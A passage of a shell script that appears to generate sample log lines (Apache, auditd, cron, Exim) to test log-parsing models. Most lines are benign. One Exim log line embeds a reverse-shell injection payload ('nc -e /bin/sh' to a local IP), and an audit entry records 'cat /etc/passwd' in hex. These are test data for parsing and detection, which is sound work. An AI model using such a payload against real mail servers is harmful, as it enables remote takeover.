rv:74.0) Gecko/20100101 Firefox/74.0"' >> $LOGFILE echo '111.222.333.123 HOME user1 [01/Feb/1998:01:08:39 -0800] "GET /bannerad/ad.htm HTTP/1.0" 200 198 "http://www.referrer.com/bannerad/ba_intro.htm" "Mozilla/4.01 (Macintosh; I; PPC)"' >> $LOGFILE echo '::1 - - [31/Mar/2020:15:14:28 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1c (internal dummy connection)"' >> $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:55 +0000] "POST /nag/task/save.php HTTP/1.1" 200 5220 "-" "-"' >> $LOGFILE echo 'www.google.com - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; AudispdParsingModel) echo "audispd: type=ADD_GROUP msg=audit(1525173583.598:2104): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding group acct=\"raman\" exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" > $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.670:2105): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding user id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" >> $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.677:2106): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding home directory id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" >> $LOGFILE echo 'type=ANOM_ABEND msg=audit(1459467717.181:189187): auid=4294967295 uid=977 gid=2010 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 pid=40239 comm="radiusd" reason="memory violation" sig=11' >> $LOGFILE echo 'audispd: type=ANOM_ABEND msg=audit(1459370041.594:534): auid=10000 uid=0 gid=0 ses=6 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 pid=3697 comm="sshd" reason="memory violation" sig=6' >> $LOGFILE echo "audispd: type=ANOM_ACCESS_FS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ADD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_AMTU_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_CRYPTO_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_DEL_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_EXEC msg=audit(1222174623.498:608): user pid=12965 uid=1 auid=2 ses=1 msg='op=PAM:unix_chkpwd acct=\"snap\" exe=\"/sbin/unix_chkpwd\" (hostname=?, addr=?, terminal=pts/0 res=failed)'" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_FAILURES msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_LOCATION msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_SESSIONS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_TIME msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_DAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_MAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MK_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MOD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_PROMISCUOUS msg=audit(1390181243.575:738): dev=vethDvSeyL prom=256 old_prom=256 auid=4294967295 uid=0 gid=0 ses=4294967295" >> $LOGFILE echo "audispd: type=ANOM_RBAC_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_RBAC_INTEGRITY_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ROOT_TRANS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "type=AVC msg=audit(1226270358.848:238): avc: denied { write } for pid=13349 comm=\"certwatch\" name=\"cache\" dev=dm-0 ino=218171 scontext=system_u:system_r:certwatch_t:s0 tcontext=system_u:object_r:var_t:s0 tclass=dir" >> $LOGFILE echo "audispd: type=AVC_PATH msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo 'audispd: type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE echo "type=CAPSET msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHGRP_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHUSER_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CONFIG_CHANGE msg=audit(1368831799.081:466947): auid=4294967295 ses=4294967295 op=\"remove rule\" path=\"/path/to/my/bin0\" key=(null) list=4 res=1" >> $LOGFILE echo "type=CONFIG_CHANGE msg=audit(1479097266.018:224): auid=500 ses=2 op=\"updated_rules\" path=\"/etc/passwd\" key=\"passwd_changes\" list=4 res=1" >> $LOGFILE echo "audispd: type=CRED_ACQ msg=audit(1450894634.199:1276): pid=1956 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_DISP msg=audit(1450894635.111:1281): pid=1956 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_REFR msg=audit(1450894634.211:1279): pid=1958 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRYPTO_FAILURE_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_KEY_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGIN msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_PARAM_CHANGE_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_REPLAY_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_SESSION msg=audit(1150750972.008:3281471): user pid=1111 uid=0 auid=1111 msg='op=start direction=from-server cipher=aes128-ctr ksize=128 rport=40791 laddr=192.168.22.22 lport=22 id=4294967295 exe=\"/usr/sbin/sshd\" (hostname=?, addr=205.22.22.22, terminal=? res=success)'" >> $LOGFILE echo "audispd: type=CRYPTO_TEST_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=CWD msg=audit(1450767416.248:3295858): cwd="/"' >> $LOGFILE echo "audispd: type=DAC_CHECK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_ABORT msg=audit(1339336882.189:9206): auditd error halt, auid=4294967295 pid=3095 res=failed" >> $LOGFILE echo "audispd: type=DAEMON_ACCEPT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CLOSE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CONFIG msg=audit(1264985324.554:4915): auditd error getting hup info - no change, sending auid=? pid=? subj=? res=failed" >> $LOGFILE echo "audispd: type=DAEMON_END msg=audit(1450876093.165:8729): auditd normal halt, sending auid=0 pid=1 subj= res=success" >> $LOGFILE echo "audispd: type=DAEMON_RESUME msg=audit(1300385209.456:8846): auditd resuming logging, sending auid=? pid=? subj=? res=success" >> $LOGFILE echo "audispd: type=DAEMON_ROTATE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_START msg=audit(1450875964.131:8728): auditd start, ver=2.4 format=raw kernel=3.16.0-4-amd64 auid=4294967295 pid=1437 res=failed" >> $LOGFILE echo "audispd: type=DEL_GROUP msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=DEL_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=EOE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' >> $LOGFILE echo "audispd: type=FD_PAIR msg=audit(1431919799.945:49458): fd0=5 fd1=6" >> $LOGFILE echo "audispd: type=FS_RELABEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=GRP_AUTH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_DATA msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_HASH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_METADATA msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_PCR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_RULE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_STATUS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC_SET_PERM msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL_OTHER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_LEVEL_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_OVERRIDE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LOGIN msg=audit(1450767601.778:3296208): login pid=15763 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=2260" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CONFIG_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_IPSEC_EVENT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_POLICY_LOAD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_STATUS msg=audit(1336836093.835:406): enforcing=1 old_enforcing=0 auid=0 ses=2" >> $LOGFILE echo "audispd: type=MAC_UNLBL_ALLOW msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCDEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MMAP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_GETSETATTR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_NOTIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_OPEN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_SENDRECV msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=NETFILTER_CFG msg=audit(1479622038.866:2): table=filter family=2 entries=0" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.386:228): mark=0xae8a2732 saddr=127.0.0.1 daddr=127.0.0.1 proto=17" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.381:227): mark=0x223894b7 saddr=::1 daddr=::1 proto=58" >> $LOGFILE echo "audispd: type=OBJ_PID msg=audit(1279134100.434:193): opid=1968 oauid=-1 ouid=0 oses=-1 obj= ocomm=\"sleep\"" >> $LOGFILE echo 'audispd: type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'audispd: type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_REMOTE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_UNLOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ALERT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ANOMALY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_HALT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_KILL_PROC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SEBOOL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SINGLE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_ACCESS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_ASSIGN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_MODIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_REMOVE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SELINUX_ERR msg=audit(1311948547.151:138): op=security_compute_av reason=bounds scontext=system_u:system_r:anon_webapp_t:s0-s0:c0,c100,c200 tcontext=system_u:object_r:security_t:s0 tclass=dir perms=ioctl,read,lock" >> $LOGFILE echo "audispd: type=SERVICE_START msg=audit(1450876900.115:30): pid=1 uid=0 auid=4294967295 ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'" >> $LOGFILE echo "audispd: type=SERVICE_STOP msg=audit(1450876900.115:31): pid=1 uid=0 auid=4294967295 ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'" >> $LOGFILE echo "audispd: type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "audispd: type=SOCKETCALL msg=audit(1134642541.683:201): nargs=3 a0=10 a1=3 a2=9" >> $LOGFILE echo 'audispd: type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo "audispd: type=SYSTEM_BOOT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_RUNLEVEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_SHUTDOWN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TRUSTED_APP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TTY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_ACCT msg=audit(1234877011.795:7732): user pid=26127 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/sbin/sshd\" (hostname=jupiter.example.com, addr=192.168.2.100, terminal=ssh res=success)'" >> $LOGFILE echo "audispd: type=USER_AUTH msg=audit(1451403184.143:1834): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=failed'" >> $LOGFILE echo "audispd: type=USER_AUTH msg=audit(1451403193.995:1835): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=USER_AVC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_CHAUTHTOK msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_CMD msg=audit(1450785575.705:3316357): user pid=21619 uid=0 auid=526 msg='cwd=\"/home/hi\" cmd=\"/bin/bash\" (terminal=pts/0 res=success)'" >> $LOGFILE echo "audispd: type=USER_END msg=audit(1450767601.813:3296218): user pid=15764 uid=0 auid=0 msg='PAM: session close acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo "audispd: type=USER_ERR msg=audit(1450770602.157:3300444): user pid=16643 uid=0 auid=4294967295 msg='PAM: bad_ident acct="?" : exe=\"/usr/sbin/sshd\" (hostname=111.111.211.38, addr=111.111.211.38, terminal=ssh res=failed)'" >> $LOGFILE echo "audispd: type=USER_LABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_LOGIN msg=audit(1450770603.209:3300446): user pid=16649 uid=0 auid=4294967295 msg='acct=\"root\": exe=\"/usr/sbin/sshd\" (hostname=?, addr=11.111.53.58, terminal=sshd res=failed)'" >> $LOGFILE echo "audispd: type=USER_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MAC_POLICY_LOAD msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MGMT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_ROLE_CHANGE msg=audit(1280266360.845:51): user pid=1978 uid=0 auid=500 subj=system_u:system_r:local_login_t:s0-s0:c0.c1023 msg='pam: default-context=user_u:system_r:unconfined_t:s0 selected-context=user_u:system_r:unconfined_t:s0: exe=\"/bin/login\" (hostname=?, addr=?, terminal=tty1 res=success)'" >> $LOGFILE echo "audispd: type=USER_SELINUX_ERR msg=audit(1311948547.151:138): Text" >> $LOGFILE echo "audispd: type=USER_START msg=audit(1450771201.437:3301540): user pid=16878 uid=0 auid=0 msg='PAM: session open acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo "audispd: type=USER_TTY msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_UNLABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USYS_CONFIG msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_CONTROL msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_MACHINE_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_RESOURCE msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audisp-remote: queue is full - dropping event" >> $LOGFILE echo "audispd: queue is full - dropping event" >> $LOGFILE echo "audispd: type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE ;; CronParsingModel) echo "CRON[25537]: (root) CMD ping 8.8.8.8" > $LOGFILE echo "CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)" >> $LOGFILE echo "CRON[12461]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)" >> $LOGFILE echo "CRON[12460]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "CRON[13229]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)" >> $LOGFILE echo "CRON[14368]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)" >> $LOGFILE ;; EximGenericParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE # following examples are covering exim failure message types. The examples are taken from # https://forums.cpanel.net/resources/reading-and-understanding-the-exim-main_log.383/ echo "2014-09-29 21:27:08 1XYdJu-002e6P-9F SMTP error from remote mail server after MAIL FROM: SIZE=6601: host mta5.am0.yahoodns.net [66.196.118.240]: 421 4.7.0 [GL01] Message from (184.171.253.133) temporarily deferred - 4.16.50. Please refer to http://postmaster.yahoo.com/errors/postmaster-21.html" >> $LOGFILE echo "2020-04-28 22:08:03 1m1x23-2011cZ-MN H=mta7.am0.yahoodns.net [67.195.228.106]: SMTP error from remote mail server after pipelined MAIL FROM: SIZE=1758: 421 4.7.0 [TSS04] Messages from 184.171.253.133 temporarily deferred due to unexpected volume or user complaints - 4.16.55.1; see https://postmaster.verizonmedia.com/error-codes" >> $LOGFILE echo "2014-09-12 08:01:12 1XSLn4-003Fa1-OX SMTP error from remote mail server after end of data: host gmail-smtp-in.l.google.com [173.194.66.27]: 421-4.7.0 [77.69.28.195 15] Our system has detected an unusual rate of\n421-4.7.0 unsolicited mail originating from your IP address. To protect our\n421-4.7.0 users from spam, mail sent from your IP address has been temporarily\n421-4.7.0 rate limited. Please visit\n421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk\n421 4.7.0 Email Senders Guidelines. q4si1448293wij.85 - gsmtp" >> $LOGFILE echo "2014-09-18 13:44:19 1XUb4M-000v5R-6R SMTP error from remote mail server after MAIL FROM: SIZE=1811: host mta7.am0.yahoodns.net [66.66.66.66]: 421 4.7.1 [TS03] All messages from 5.196.113.212 will be permanently deferred; Retrying will NOT succeed. See http://postmaster.yahoo.com/421-ts03.html" >> $LOGFILE echo "TO:: host mx.someaddress.com [20.20.20.20]: 450 4.7.1 Client host rejected: cannot find your hostname, [20.20.20.20] 2014-09-21 16:06:05 1XUKFa-0003bb-EM ** someone@someaddress>: retry timeout exceeded" >> $LOGFILE echo "2014-10-10 10:25:01 1XcKLM-003IGU-Fr SMTP error from remote mail server after RCPT TO:: host pro-mail-mx-002.bol.com [20.20.20.20]: 450 4.7.1 Service unavailable" >> $LOGFILE echo "2014-09-24 12:59:49 1XWqqy-00028x-FK == test@badluckbryan.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host gylsystems.com [69.69.69.69]: 451 Temporary local problem - please try later" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (mail.fictional.example) [::1]:49956 sender verify defer for : require_files: error for /home/aaron/etc/domain.com: Permission denied" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (srv-hs1.netsons.net) [::1]:49956 F= A=dovecot_login:aaron@domain.com temporarily rejected RCPT : Could not complete sender verify" >> $LOGFILE echo "2014-09-13 11:37:53 1XSdCz-00049U-5A ==aaron@domain.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host mail.fictional.example [10.5.40.204]: 452 Domain size limit exceeded" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PX-0006SC-Qa ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after RCPT TO:: host mail.domain.com [10.5.40.204]: 550-Verification for \n550-The mail server could not deliver mail to garfield@domain.com. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries.\n550 Sender verify failed" >> $LOGFILE echo "SMTP error from remote mail server after RCPT TO:: host mail.fictional.example[10.5.40.204]: 550-Sender has no A, AAAA, or MX DNS records. mail.fictional.example\n550 l mail.fictional.example\nVerify the zone file in /etc/named for the correct information. If it appear correct, you can run named-checkzone domain.com domain.com.db to verify if named is able to load the zone." >> $LOGFILE echo "Diagnostic-Code: X-Postfix; host mail1.domain.com [10.5.40.204] said: 550 5.7.1 Message rejected due to content restrictions (in reply to end of DATA command)\nWhen you see an error such as 550 5.7.1" >> $LOGFILE echo "Final-Recipient: rfc822;aaron@domain.com\nAction: failed\nStatus: 5.5.0\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\n550-mail.fictional.example [10.5.40.204]:58133 is not permitted to relay 550 through this server without authentication." >> $LOGFILE echo "DHE-RSA-AES256-SHA:256: SMTP error from remote mail server after MAIL FROM: SIZE=1834: host mail.fictional.example [10.5.40.204..212]: 550 \"REJECTED - Bad HELO - Host impersonating [mail.fictional2.example]\"" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PY-0006SO-GS <= <> R=1XO5PX-0006SC-Qa U=mailnull P=local S=1951 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com" >> $LOGFILE echo "SMTP error from remote mail server after MAIL FROM:: host mail.fictional.example [10.5.40.204]: 553 sorry, your domain does not exists." >> $LOGFILE echo "2014-11-26 10:26:32 1XtYro-004Ecv-65 ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after MAIL FROM: SIZE=1604: host mail.fictional.example [10.5.40.204]: 553 unable to verify address\nVerify that SMPT authentication has been enabled." >> $LOGFILE echo "[15:03:30 hosts5 root /var/log]cPs# grep 1XeRdP-0006JC-FO exim_mainlog 2014-10-15 12:41:11 1XeRdP-0006JC-FO <= <> R=1XeRdF-0006HI-EY U=mailnull P=local S=5445 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com 2014-10-15 12:41:11 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1XeRdP-0006JC-FO 2014-10-15 12:42:12 1XeRdP-0006JC-FO ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after end of data: host mail.fictional.example [10.5.40.204]: 554 rejected due to spam content" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS H=mail.fictional.example [10.5.40.204]:4779 Warning: \"SpamAssassin as marka22 detected message as spam (11.0)\"" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS <=10.5.40.204 H=mail.fictional.example[10.5.40.204]:4779 P=esmtp S=491878 id=dos45yx4zbmri7f@domain.com T="Payment confirmation: 7037487121" for aaron@domain.net [" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS => aaron R=virtual_user_spam T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS Completed 2014-10-01 15:30:35 1XZKvG-0002HW-ML H=(12-12-12-12.domain.net [10.5.40.204]:65376 Warning: \"SpamAssassin as marka22 detected message as spam (7.2)\"" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML <= item@something.net H=(12-12-12-12.domain.net [10.5.40.204]:65376 P=esmtp S=519381 id=dos45yx4zbmri7f@domain.com T=\"Payment confirmation: 7037487121\" for mark@domain.com 2014-10-01 15:30:35 1XZKvG-0002HW-ML => mark R=virtual_user_spam 